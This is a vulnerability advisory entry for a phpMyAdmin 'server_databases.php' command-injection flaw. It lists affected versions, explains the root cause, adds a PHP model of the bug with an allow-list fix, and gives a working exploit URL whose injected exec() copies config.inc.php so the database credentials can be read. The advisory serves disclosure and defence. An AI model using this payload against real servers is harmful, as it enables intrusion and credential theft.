phpMyAdmin <= 3.2 - 'server_databases.php' Remote Command Execution Vulnerability

2014-07-01T00:00:00
ID SSV:85670
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

phpMyAdmin 'server_databases.php' Remote Command Execution Vulnerability

Affected systems

Typo3 phpMyAdmin 3.2

Typo3 phpMyAdmin 3.0.1

Typo3 phpMyAdmin 3.0

Typo3 phpMyAdmin 0.2.2

Turbolinux Appliance Server 3.0 x64

Turbolinux Appliance Server 3.0

SuSE openSUSE 10.3

S.u.S.E. openSUSE 11.1

S.u.S.E. openSUSE 11.0

phpMyAdmin phpMyAdmin 2.11.9

phpMyAdmin phpMyAdmin 2.11.8

phpMyAdmin phpMyAdmin 2.11.7

phpMyAdmin phpMyAdmin 2.11.5

phpMyAdmin phpMyAdmin 2.11.4

phpMyAdmin phpMyAdmin 2.11.1

phpMyAdmin phpMyAdmin 2.9.1

phpMyAdmin phpMyAdmin 2.9.2-rc1

phpMyAdmin phpMyAdmin 2.9.1.1

phpMyAdmin phpMyAdmin 2.11.8.1

phpMyAdmin phpMyAdmin 2.11.5.2

phpMyAdmin phpMyAdmin 2.11.5.1

phpMyAdmin phpMyAdmin 2.11.2.2

phpMyAdmin phpMyAdmin 2.11.2.1

phpMyAdmin phpMyAdmin 2.11.1.2

phpMyAdmin phpMyAdmin 2.11.1.1

phpMyAdmin phpMyAdmin 2.10.0.2

phpMyAdmin phpMyAdmin 2.10.0.1

MandrakeSoft Corporate Server 4.0 x86_64

MandrakeSoft Corporate Server 4.0

Gentoo Linux

Debian Linux 4.0 sparc

Debian Linux 4.0 s/390

Debian Linux 4.0 powerpc

Debian Linux 4.0 mipsel

Debian Linux 4.0 mips

Debian Linux 4.0 m68k

Debian Linux 4.0 ia-64

Debian Linux 4.0 ia-32

Debian Linux 4.0 hppa

Debian Linux 4.0 arm

Debian Linux 4.0 amd64

Debian Linux 4.0 alpha

Debian Linux 4.0

Root cause:

The value of the sort_by request parameter is used without validation or escaping, so an authenticated user can supply PHP code that the application compiles and executes. A successful attack compromises the affected component and can extend to the underlying host.

Exploit (the request must be sent from a valid logged-in session and carry that session's token; the injected command copies config.inc.php, which holds the MySQL connection settings and credentials, to config.txt in the phpMyAdmin directory, where a plain .txt file is normally served verbatim by the web server):

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
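The following is an added illustrative model of the bug and its fix; it is not phpMyAdmin's own code. It assumes that the sort_by value is spliced into the source text of a dynamically compiled comparison callback, which is what the payload shape `"]) OR exec(...); //` implies: close the `$a["..."]` index and the enclosing call, append a statement, and comment out whatever follows. The block prints the PHP source the exploit string would produce, runs the same path with a harmless constructed payload so the injection is visible, and contrasts it with an allow-list comparator that never compiles request data. The harmless payload keeps both strnatcasecmp() arguments and adds `0 * print(...)` instead of `OR`, because the `OR` form depends on a one-argument strnatcasecmp() call only warning and returning NULL, whereas PHP 8 throws ArgumentCountError there. The column names, sample rows and allow-list are assumptions.

```php
<?php
// Added illustrative model, not phpMyAdmin's code.
// Assumption: the sort_by request parameter is spliced into the source of a
// dynamically compiled comparison callback (create_function() in the PHP 5 era;
// an eval()'d closure here so the model runs on current PHP).

// Constructed: the page's exploit value for sort_by, URL-decoded.
$pagePayload = '"]) OR exec(\'cp $(pwd)"/config.inc.php" config.txt\'); //';

// Constructed: a harmless payload in the same shape, used to run the demo.
$demoPayload = 'SCHEMA_NAME"], $b["SCHEMA_NAME"]) + 0 * print("injected code ran\n"); //';

// Constructed sample rows, shaped like INFORMATION_SCHEMA.SCHEMATA records.
$rows = [
    ['SCHEMA_NAME' => 'test'],
    ['SCHEMA_NAME' => 'app'],
    ['SCHEMA_NAME' => 'Mysql'],
];

/** Vulnerable: request data becomes part of PHP source that is then compiled. */
function vulnerableCallbackSource(string $sortBy): string
{
    return "return function (\$a, \$b) {\n"
        . '    return strnatcasecmp($a["' . $sortBy . '"], $b["' . $sortBy . '"]);' . "\n"
        . "};";
}

function vulnerableSort(array $rows, string $sortBy): array
{
    usort($rows, eval(vulnerableCallbackSource($sortBy)));
    return $rows;
}

/** Hardened: accept only known column names and never compile request data. */
function safeComparator(string $sortBy): callable
{
    // Assumed allow-list; real code would enumerate its own column set.
    $allowed = ['SCHEMA_NAME', 'DEFAULT_COLLATION_NAME'];
    if (!in_array($sortBy, $allowed, true)) {
        throw new InvalidArgumentException("unsupported sort column: $sortBy");
    }
    return static function (array $a, array $b) use ($sortBy): int {
        return strnatcasecmp((string) $a[$sortBy], (string) $b[$sortBy]);
    };
}

// 1. What the vulnerable path would compile for the page's payload: the array
//    index and the strnatcasecmp() call are closed, exec() is appended, and the
//    trailing // discards the remainder of the template line.
echo vulnerableCallbackSource($pagePayload), "\n\n";

// 2. The same path with the harmless payload: the injected print() runs once
//    per comparison, proving the request value was executed as PHP.
$sorted = vulnerableSort($rows, $demoPayload);
echo implode(',', array_column($sorted, 'SCHEMA_NAME')), "\n";

// 3. The hardened path sorts normally and refuses the exploit string outright.
$sorted = $rows;
usort($sorted, safeComparator('SCHEMA_NAME'));
echo implode(',', array_column($sorted, 'SCHEMA_NAME')), "\n";
try {
    safeComparator($pagePayload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Run it with `php model.php`. The fix is not escaping: a sort column is a choice among a fixed set of keys, so the only sound handling is an allow-list compared with strict equality, with the chosen key then used as data inside a real closure rather than as text inside generated code.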

                                        
                                            
                                                source: http://www.securityfocus.com/bid/31188/info

phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

This issue affects versions prior to phpMyAdmin 2.11.9.1.
